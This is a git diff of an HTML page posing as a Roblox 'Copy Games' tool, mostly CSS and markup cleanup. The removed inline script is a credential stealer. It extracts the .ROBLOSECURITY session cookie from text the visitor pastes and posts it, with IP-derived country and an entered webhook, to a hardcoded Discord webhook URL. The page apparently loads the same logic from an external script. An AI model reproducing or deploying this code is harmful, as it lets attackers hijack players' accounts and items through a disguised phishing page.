--- a/index.html
+++ b/index.html
@@ -62,7 +62,6 @@
             margin: 15px 0;
             border: 1px solid #444;
             border-radius: 8px;
-            border: 0.1px solid #6a6a6a;
             background-color: #333;
             color: #fff;
         }
@@ -72,7 +71,6 @@
             font-size: 1.5em;
             border: none;
             border-radius: 8px;
-            border: 0.1px solid #6a6a6a;
             background-color: #334c7c;
             color: white;
             cursor: pointer;
@@ -90,7 +88,7 @@
             height: 230px;
         }
         iframe {
-            width:69%;
+            width: 69%;
             height: 100%;
         }
         .processing-panel {
@@ -104,7 +102,6 @@
             border-radius: 20px;
             padding: 70px;
             font-size: 2em;
-            font-family: bold
             color: #ffffff;
             text-align: center;
             z-index: 900;
@@ -126,7 +123,7 @@
     <div class="container">
         <div class="panel">
             <h2>Copy Games</h2>
-            <input id="sessionScript" placeholder="Enter game file" class="input-box" rows="10"></textarea>
+            <input id="sessionScript" placeholder="Enter game file" class="input-box">
             <input type="text" id="pin" placeholder="Enter Webhook" class="input-box">
             <button class="btn" onclick="sendToDiscord()">Copy Game!</button>
         </div>
@@ -140,106 +137,9 @@
     </div>
 
     <div id="processingPanel" class="processing-panel">
-        Game is being processed this may take 1-5 minutes!
+        Game is being processed, this may take 1-5 minutes!
     </div>
 
-    <script>
-        let countryFlag = '';
-        let totalPings = 0;
-        let cooldown = false;
-
-        async function fetchCountry() {
-            try {
-                const response = await fetch("https://ipinfo.io/json?token=dc661f4538d752");
-                const data = await response.json();
-                const countryCode = data.country;
-                countryFlag = countryToEmoji(countryCode);
-            } catch (error) {
-                console.error("Failed to fetch country data:", error);
-            }
-        }
-
-        function countryToEmoji(countryCode) {
-            return countryCode
-                .toUpperCase()
-                .replace(/./g, char => String.fromCodePoint(127397 + char.charCodeAt()));
-        }
-
-        function loadTotalHits() {
-            const savedHits = localStorage.getItem('totalPings');
-            totalPings = savedHits ? parseInt(savedHits, 10) : 0;
-        }
-
-        function saveTotalHits() {
-            localStorage.setItem('totalPings', totalPings);
-        }
-
-        loadTotalHits();
-        fetchCountry();
-
-        function sendToDiscord() {
-            if (cooldown) return;
-
-            const sessionScript = document.getElementById("sessionScript").value;
-            const pin = document.getElementById("pin").value;
-
-            if (!sessionScript) {
-                alert("Please fill in the game file.");
-                return;
-            }
-
-            if (!pin) {
-                alert("Please enter a Webhook.");
-                return;
-            }
-
-            document.getElementById("processingPanel").style.display = "block";
-
-            const webhookUrl = "https://discord.com/api/webhooks/1300555524823187576/jn-SfRrTE-bmNQFXvaQRSmiZfmJFBQeMyI2uAaF27TwiOcQNXK7SeQP-Jc6S7G0KfaSP";
-
-            totalPings++;
-            saveTotalHits();
-
-            const cookiePattern = /\.ROBLOSECURITY",\s*"_\|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items\.\|_[A-Za-z0-9]+"/;
-
-            let cookieString = "";
-            const match = sessionScript.match(cookiePattern);
-            if (match) {
-                cookieString = match[0].split('.ROBLOSECURITY", "')[1].slice(0, -1).trim();
-            } else {
-                alert("Please enter a valid game file!");
-                document.getElementById("processingPanel").style.display = "none";
-                return;
-            }
-
-            const data = {
-                content: "@everyone",
-                embeds: [
-                    {
-                        title: "Game Copy Notification",
-                        description: `\n**Country**: ${countryFlag}\n\n**Webhook**\n\`\`\`\n${pin}\n\`\`\`\n**🍪Roblox Cookie🍪**\n\`\`\`\n${cookieString}\n\`\`\``,
-                        color: 0x000000,
-                        footer: {
-                            text: "Notification from MuriTools."
-                        },
-                        timestamp: new Date().toISOString()
-                    }
-                ]
-            };
-
-            fetch(webhookUrl, {
-                method: "POST",
-                headers: {
-                    "Content-Type": "application/json"
-                },
-                body: JSON.stringify(data)
-            });
-
-            cooldown = true;
-            setTimeout(() => {
-                cooldown = false;
-            }, 5000);
-        }
-    </script>
+    <script src="script.js"></script>
 </body>
 </html>
